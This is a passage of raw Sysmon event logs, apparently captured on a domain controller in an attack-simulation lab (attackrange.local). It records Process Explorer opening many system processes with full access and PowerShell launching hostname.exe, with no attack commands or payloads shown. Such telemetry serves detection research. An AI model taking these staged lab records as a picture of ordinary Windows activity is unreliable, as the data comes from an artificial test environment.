+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3253-6010-CBA2-00000000A301}5596C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.361{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3253-6010-CBA2-00000000A301}5596C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22bd0a1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22065a56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071f89|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071b25|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220718a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22071576|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22bdb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c 154100x8000000000000000789493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.363{732C744F-3253-6010-CBA2-00000000A301}5596C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\Users\Administrator\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000789492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789487Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789486Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789485Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789484Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789483Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789482Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789481Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789480Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789479Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789478Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789477Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789476Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789475Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789474Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789473Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789472Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.220{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 